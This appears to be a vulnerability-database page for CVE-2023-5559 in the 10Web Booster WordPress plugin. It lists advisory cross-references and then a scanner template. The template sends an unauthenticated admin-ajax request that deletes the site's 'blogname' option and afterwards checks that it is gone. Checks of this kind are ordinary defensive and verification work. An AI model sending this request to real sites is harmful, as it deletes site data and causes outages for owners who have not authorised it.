| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2023-5559 | 17 Dec 202309:06 | – | circl | |
| WordPress plugin 10Web Booster security vulnerability | 27 Nov 202300:00 | – | cnnvd | |
| CVE-2023-5559 | 27 Nov 202316:22 | – | cve | |
| CVE-2023-5559 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion | 27 Nov 202316:22 | – | cvelist | |
| EUVD-2023-57859 | 27 Nov 202316:22 | – | euvd | |
| CVE-2023-5559 | 27 Nov 202317:15 | – | nvd | |
| CVE-2023-5559 | 27 Nov 202317:15 | – | osv | |
| Design/Logic Flaw | 27 Nov 202317:15 | – | prion | |
| PT-2023-32175 | 27 Nov 202300:00 | – | ptsecurity | |
| VulnCheck KEV: CVE-2023-5559 | 29 Oct 202300:00 | – | vulncheck_kev |
id: CVE-2023-5559
info:
name: 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion
author: daffainfo
severity: critical
description: |
The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.
impact: |
Unauthenticated attackers can delete arbitrary WordPress options from the database, leading to denial of service and potential site malfunction.
remediation: |
Update 10Web Booster plugin to version 2.24.18 or later.
reference:
- https://wpscan.com/vulnerability/eba46f7d-e4db-400c-8032-015f21087bbf/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5559
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2023-5559
epss-score: 0.02811
epss-percentile: 0.84803
cpe: cpe:2.3:a:10web:10web_booster:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: 10web
product: 10web_booster
framework: wordpress
publicwww-query: "/wp-content/plugins/tenweb-speed-optimizer"
tags: cve,cve2023,wordpress,wp-plugin,wp,10web,vkev,intrusive,vuln
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json"
- "?rest_route=/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "{\"name\":\"", "\"description\":")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=two_activate_score_check&nonce=blogname
matchers:
- type: dsl
dsl:
- status_code == 200
internal: true
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json"
- "?rest_route=/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "\"name\":false")'
condition: and
# digest: 4a0a00473045022100c76a9f4cf8e9da65140ff274afe35a43fbf704dd631afa41c6da4c707986ad3302203f272b11d16b63f278704c68d5dec83b9387db4af95cf3abb2eafcccff5f351d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation